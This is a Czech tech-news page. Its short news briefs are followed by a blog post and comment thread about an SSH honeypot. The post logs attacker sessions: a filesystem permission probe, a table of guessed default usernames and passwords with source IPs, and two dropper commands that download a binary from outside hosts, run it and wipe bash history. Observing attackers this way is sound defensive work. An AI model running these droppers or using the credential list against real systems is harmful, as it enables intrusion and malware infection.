Byl vydán Debian 13 s kódovým názvem Trixie. Přehled novinek v poznámkách k vydání.
WLED je open-source firmware pro ESP8266/ESP32, který umožňuje Wi-Fi ovládání adresovatelných LED pásků se stovkami efektů, synchronizací, audioreaktivním módem a Home-Assistant integrací. Je založen na Arduino frameworku.
Open source platforma Home Assistant (Demo, GitHub, Wikipedie) pro monitorování a řízení inteligentní domácnosti byla vydána v nové verzi 2025.8.
Herní studio Hangar 13 vydalo novou Mafii. Mafia: Domovina je zasazena do krutého sicilského podsvětí na začátku 20. století. Na ProtonDB je zatím bez záznamu.
Operátor O2 má opět problémy. Jako omluvu za pondělní zhoršenou dostupnost služeb dal všem zákazníkům poukaz v hodnotě 300 Kč na nákup telefonu nebo příslušenství.
Společnost OpenAI představila GPT-5 (YouTube).
Byla vydána (𝕏) červencová aktualizace aneb nová verze 1.103 editoru zdrojových kódů Visual Studio Code (Wikipedie). Přehled novinek i s náhledy a videi v poznámkách k vydání. Ve verzi 1.103 vyjde také VSCodium, tj. komunitní sestavení Visual Studia Code bez telemetrie a licenčních podmínek Microsoftu.
Americký prezident Donald Trump vyzval nového generálního ředitele firmy na výrobu čipů Intel, aby odstoupil. Prezident to zdůvodnil vazbami nového šéfa Lip-Bu Tana na čínské firmy.
Bylo vydáno Ubuntu 24.04.3 LTS, tj. třetí opravné vydání Ubuntu 24.04 LTS s kódovým názvem Noble Numbat. Přehled novinek a oprav na Discourse.
Byla vydána verze 1.89.0 programovacího jazyka Rust (Wikipedie). Podrobnosti v poznámkách k vydání. Vyzkoušet Rust lze například na stránce Rust by Example.
13:26:38 $ /gweerwe323f 13:26:38 $ 13:26:38 $ /bin/busybox cp; /gweerwe323f 13:26:38 $ 13:26:38 $ mount ;/gweerwe323f 13:26:38 $ 13:26:38 $ echo -e '\x47\x72\x6f\x70/' > //.nippon; cat //.nippon; rm -f //.nippon 13:26:38 $ 13:26:38 $ echo -e '\x47\x72\x6f\x70/tmp' > /tmp/.nippon; cat /tmp/.nippon; rm -f /tmp/.nippon 13:26:38 $ 13:26:38 $ echo -e '\x47\x72\x6f\x70/var/tmp' > /var/tmp/.nippon; cat /var/tmp/.nippon; rm -f /var/tmp/.nippon 13:26:38 $ 13:26:38 $ echo -e '\x47\x72\x6f\x70/' > //.nippon; cat //.nippon; rm -f //.nippon 13:26:38 $ 13:26:38 $ echo -e '\x47\x72\x6f\x70/lib/init/rw' > /lib/init/rw/.nippon; cat /lib/init/rw/.nippon; rm -f /lib/init/rw/.nippon 13:26:38 $ 13:26:38 $ echo -e '\x47\x72\x6f\x70/proc' > /proc/.nippon; cat /proc/.nippon; rm -f /proc/.nippon 13:26:38 $ 13:26:38 $ echo -e '\x47\x72\x6f\x70/sys' > /sys/.nippon; cat /sys/.nippon; rm -f /sys/.nippon 13:26:38 $ 13:26:38 $ echo -e '\x47\x72\x6f\x70/dev' > /dev/.nippon; cat /dev/.nippon; rm -f /dev/.nippon 13:26:38 $ 13:26:38 $ echo -e '\x47\x72\x6f\x70/dev/shm' > /dev/shm/.nippon; cat /dev/shm/.nippon; rm -f /dev/shm/.nippon 13:26:38 $ 13:26:38 $ echo -e '\x47\x72\x6f\x70/dev/pts' > /dev/pts/.nippon; cat /dev/pts/.nippon; rm -f /dev/pts/.nippon 13:26:38 $ 13:26:38 $ /gweerwe323f 13:26:38 $ 13:26:38 $ cat /bin/echo ;/gweerwe323f 13:26:38 $A takto vypada datum, cas, geolokace IP, IP, pocet sezeni, username, password:
2018-03-08 14:05:42 FRA - 51.254.121.56 1 admin admin@123 2018-03-08 14:05:40 FRA - 51.254.121.56 1 admin admin@123 2018-03-08 14:05:39 FRA - 51.254.121.56 1 admin admin@123 2018-03-08 14:05:38 FRA - 51.254.121.56 1 admin admin@123 2018-03-08 14:05:38 FRA - 51.254.121.56 1 admin admin@123 2018-03-08 13:26:37 185.234.218.242 30 admin motorola 2018-03-08 12:59:30 POL - 188.125.43.186 1 ethos live 2018-03-08 12:59:29 POL - 188.125.43.186 1 root live 2018-03-08 11:08:51 185.234.218.242 32 root 1234 2018-03-08 10:19:06 USA - 192.200.218.166 1 root zxc123$ 2018-03-08 10:19:05 USA - 192.200.218.166 1 root zxc123$ 2018-03-08 01:53:05 185.234.218.242 30 admin admin1 2018-03-08 00:59:23 185.234.218.242 30 user user 2018-03-07 23:28:07 185.234.218.242 0 usuario usuario 2018-03-07 20:33:47 185.234.218.242 32 root 12345 2018-03-07 19:50:26 185.234.218.242 32 root ubnt 2018-03-07 19:23:26 USA - 192.200.218.166 1 root 12345 2018-03-07 19:23:24 USA - 192.200.218.166 1 root 12345 2018-03-07 19:20:49 185.234.218.242 30 admin default 2018-03-07 19:00:22 185.234.218.242 32 root password 2018-03-07 16:45:31 FRA - 51.254.47.198 1 postgres postgres 2018-03-07 16:45:29 FRA - 51.254.47.198 1 postgres postgres 2018-03-07 16:45:28 FRA - 51.254.47.198 1 postgres postgres 2018-03-07 16:45:27 FRA - 51.254.47.198 1 postgres postgres 2018-03-07 16:45:26 FRA - 51.254.47.198 1 postgres postgres 2018-03-07 15:41:13 185.234.218.242 32 root xmhdipc 2018-03-07 13:53:48 185.234.218.242 30 admin password 2018-03-07 13:42:02 USA - 192.200.218.166 1 root 0p9o8t 2018-03-07 13:42:01 USA - 192.200.218.166 1 root 0p9o8t 2018-03-07 10:03:00 185.234.218.242 0 service service 2018-03-07 09:39:09 185.234.218.242 30 admin pfsense 2018-03-07 09:15:53 USA - 173.14.84.113 2 pi raspberry 2018-03-07 09:15:52 USA - 173.14.84.113 2 pi raspberryraspberry993311 2018-03-07 09:15:50 USA - 173.14.84.113 1 pi raspberry 2018-03-07 09:15:50 USA - 173.14.84.113 1 pi raspberryraspberry993311 2018-03-07 09:11:44 185.234.218.242 30 admin default 2018-03-07 08:50:22 185.234.218.242 32 root 123456 2018-03-07 08:04:05 185.234.218.242 32 root uClinux 2018-03-07 07:40:28 185.234.218.242 32 root 111111 2018-03-06 22:19:23 KOR - 119.192.239.192 1 ethos live 2018-03-06 22:19:19 KOR - 119.192.239.192 1 root live 2018-03-06 19:58:08 JPN - 118.241.240.233 2 pi raspberryraspberry993311 2018-03-06 19:58:07 JPN - 118.241.240.233 2 pi raspberry 2018-03-06 19:58:03 JPN - 118.241.240.233 1 pi raspberryraspberry993311 2018-03-06 19:58:02 JPN - 118.241.240.233 1 pi raspberry 2018-03-04 21:30:50 CHN - 222.186.172.48 1 root root 2018-03-04 21:30:37 CHN - 222.186.172.48 1 root root 2018-03-04 21:30:26 CHN - 222.186.172.48 1 root root 2018-03-04 21:30:13 CHN - 222.186.172.48 1 root root 2018-03-04 21:30:01 CHN - 222.186.172.48 1 root root
.nippon
? To je honeypot test na permissions?
$ rm -f /tmp/run;if [ `getconf LONG_BIT` -eq 64 ];then u="http://www.bizqsoft.com/tp2/r6.log";else u="http://www.bizqsoft.com/tp2/r.log";fi;(wget -O /tmp/run $u || curl -o /tmp/run $u || python -c "import urllib;urllib.urlretrieve('$u','/tmp/run')");echo > ~/.bash_history;chmod 0777 /tmp/run && /tmp/run;rm -rf /tmp/run
/gweerwe323f. Jinak do toho nipponu se zapisuje "Grop" jako ascii, google napoví. Já bych teda zkoušel něco jako .bash_history sice poutá víc pozornosti (teda pokud uživatel vypisuje i tečkový hidden soubory), ale dá se zase ospravedlnit bugem s $HOME. Vypadá to že to je prostě jen test oprávnění. Ony embedded systémy často můžou bejt readonly.
<trolling>
Jiz nejakou dobu se zabyvam ze zvedavosti sledovanim utocniku na SSH lakanych na tzv. hrnec medu kdy se prihlasi na server a zadavaji ruzne prikazy. Tyto jsou pak zaznamenany zrovnatak jako uzivatelska jmena, hesla a lze si pocist co se hackerovi/robotovi honi hlavou. Toto je docela zajimava vec.
A jestlipak od těch nebožáků máš souhlas se zpracováním osobních údajů v souladu s GDPR? :-D
</trolling>
/etc/motd
za nějaký legal banner podobně jako to už nějakou dobu musí dělat v usa.
Jiz nejakou dobu se zabyvam ze zvedavosti sledovanim utocniku na SSH lakanych na tzv. hrnec meduToto je hyenismus nejhrubšího zrna. Ti lidé nejsou žádní útočníci, ale běženci!!! Ve své zemi nemají dostatek serverů, na kterých by se mohli realizovat, a tak hledají útočiště u nás. Proč automaticky předpokládáte, že vám chtějí škodit?? Místo, abyste se choval jako obyčejný xenofob a nácek, byste jim měl pomoci, podělit se o svůj nadbytek a poskytnout jim prostor na svém serveru. Oni vám vůbec škodit nemusí - a můžou vám naopak třeba obohatit operační systém nějakým skriptem nebo binárkou, ze kterých se něco naučíte, nebo které můžete sám používat. Nebo díky nim získáte kontakty na jiné servery, na které se jde připojit... Třeba taky jednou budete potřebovat pomoc, tak na to myslete, než se příště budete chovat zase takhle sobecky.
$ #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://199.231.68.230/ys808e curl -O http://199.231.68.230/ys808e chmod +x ys808e ./ys808eVirustotal rika toto
Tiskni
Sdílej: